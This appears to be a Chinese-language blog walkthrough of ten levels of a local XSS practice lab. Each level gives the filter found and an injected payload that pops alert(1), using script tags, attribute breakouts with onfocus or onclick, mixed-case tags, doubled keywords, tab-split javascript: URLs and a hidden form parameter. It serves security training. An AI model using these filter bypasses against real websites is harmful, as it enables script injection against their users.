XSS靶机
第一关
![](https://upload-images.jianshu.io/upload_images/4664072-33a95a9f9be9ba40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
localhost:8083/xss/level1.php?name=test<script>alert(1)</script>
![](https://upload-images.jianshu.io/upload_images/4664072-f96b436427869394.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第二关
![](https://upload-images.jianshu.io/upload_images/4664072-145b2f71d7c8e246.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
源码
![](https://upload-images.jianshu.io/upload_images/4664072-ceb02b0257071704.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
文本框输入js代码,查看源码
![](https://upload-images.jianshu.io/upload_images/4664072-3a5f9cf3f5c7ab9e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
由于第一个,[<]被转义,因此在第二个里试
源代码的样式
<input name=keyword value=" ">
插入的代码
"><script>alert(1)</script><a class="
完整显示的代码
<input name=keyword value=""><script>alert(1)</script><a class="">
![](https://upload-images.jianshu.io/upload_images/4664072-35b3b506db56533b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第三关
"><script>alert(1)</script><aclass="
![](https://upload-images.jianshu.io/upload_images/4664072-a3ef995de3def14e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第二个也对[<]做了转义,是单引号
<input name=keyword value=' '>' onfocus='alert(1)<input name=keyword value='' onfocus='alert(1)'>
![](https://upload-images.jianshu.io/upload_images/4664072-e3f2f1afa4a30967.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第四关
![](https://upload-images.jianshu.io/upload_images/4664072-b60d8cfc608a67d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
双引号
<input name=keyword value=" ">" onfocus="alert(1)<input name=keyword value="" onfocus="alert(1)">
![](https://upload-images.jianshu.io/upload_images/4664072-0e917cbcf79967c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第五关
![](https://upload-images.jianshu.io/upload_images/4664072-771e54d173267f9e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
双引号,对on进行过滤
"><ScRiPt>alert(1)</script><a class="
![](https://upload-images.jianshu.io/upload_images/4664072-0c5b5d6cc673e4d6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
对script进行过滤
<input name=keyword value=" ">"><a href="javascript:alert(1)">点击我</a class="<input name=keyword value=" "><a href="javascript:alert(1)">点击我</a class=" ">
![](https://upload-images.jianshu.io/upload_images/4664072-df1c80647e545610.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第六关
![](https://upload-images.jianshu.io/upload_images/4664072-87c2025b2f834eee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
对href进行了过滤
<input name=keyword value=" ">"><ScRiPt>alert(1)</script><a class="<input name=keyword value=""><ScRiPt>alert(1)</script><a class="">
![](https://upload-images.jianshu.io/upload_images/4664072-1bd110bde274627a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第七关
![](https://upload-images.jianshu.io/upload_images/4664072-165b1bace3215998.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
<input name=keyword value=" ">"><scrscriptipt>alert(1)</scscriptript><a class="<input name=keyword value=""><scrscriptipt>alert(1)</scscriptript><a class="">
![](https://upload-images.jianshu.io/upload_images/4664072-452d8e2cdcf06cda.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第八关
![](https://upload-images.jianshu.io/upload_images/4664072-e3b80fa4f289b88e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
对script进行了过滤
使用伪事件(用tab进行反过滤)
<a href=" ">javasc ript:alert(1)<a href="javasc ript:alert(1)">
![](https://upload-images.jianshu.io/upload_images/4664072-407f5bfc636d0a58.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第九关
![](https://upload-images.jianshu.io/upload_images/4664072-7c46544af22c9c64.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现只有使用http://,且他们为完整的就行
伪事件(将r转化为10进制)
<a href=" ">javascript:alert('http://')<a href="javascript:alert('http://')">
![](https://upload-images.jianshu.io/upload_images/4664072-fd629409d1f8a7e2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第十关
![](https://upload-images.jianshu.io/upload_images/4664072-38484a68e6835d2c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
有三个input标签被隐藏,在url上看看
?keyword=well done!&t_link=111&t_history=222&t_sort=333
![](https://upload-images.jianshu.io/upload_images/4664072-3659b2222fff0fb0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第三个input标签有显示,在这个上面想方法
<input name="t_sort" value="333" type="hidden">&t_sort=333" onclick=alert(1) type="text<input name="t_sort" value="333" onclick=alert(1)type="text " type="hidden">
把input显示出来
![](https://upload-images.jianshu.io/upload_images/4664072-5f115e2fcee949b3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)